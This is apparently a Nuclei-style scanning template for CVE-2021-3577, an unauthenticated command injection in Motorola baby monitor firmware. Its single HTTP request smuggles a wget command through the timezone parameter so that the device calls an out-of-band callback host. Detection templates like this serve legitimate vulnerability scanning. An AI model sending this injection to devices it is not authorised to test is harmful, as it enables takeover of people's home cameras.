id: CVE-2021-3577 info: name: Motorola Baby Monitors - Remote Command Execution author: gy741 severity: high description: Motorola Baby Monitors contains multiple interface vulnerabilities could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. remediation: | Apply the latest firmware update provided by Motorola to mitigate the vulnerability and ensure the device is not accessible from untrusted networks. reference: - https://randywestergren.com/unauthenticated-remote-code-execution-in-motorola-baby-monitors/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3577 - https://binatoneglobal.com/security-advisory/ classification: cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2021-3577 cwe-id: CWE-863,CWE-78 epss-score: 0.96855 epss-percentile: 0.99615 cpe: cpe:2.3:o:binatoneglobal:halo\+_camera_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: binatoneglobal product: halo\+_camera_firmware tags: cve,cve2021,rce,oast,motorola,iot http: - raw: - | GET /?action=command&command=set_city_timezone&value=$(wget%20http://{{interactsh-url}})) HTTP/1.1 Host: {{Hostname}} Accept: */* matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - type: word words: - "set_city_timezone" - type: status status: - 200 # digest: 4b0a00483046022100cee40628d0371c43e16554cf21ae37b22dfce830fdc5da2006e50ef9b4e15bf0022100a67c3906068673c1701687b83db6e9d958d9917f2d1a40d027d448ecfcc94768:922c64590222798bb761d5b6d8e72950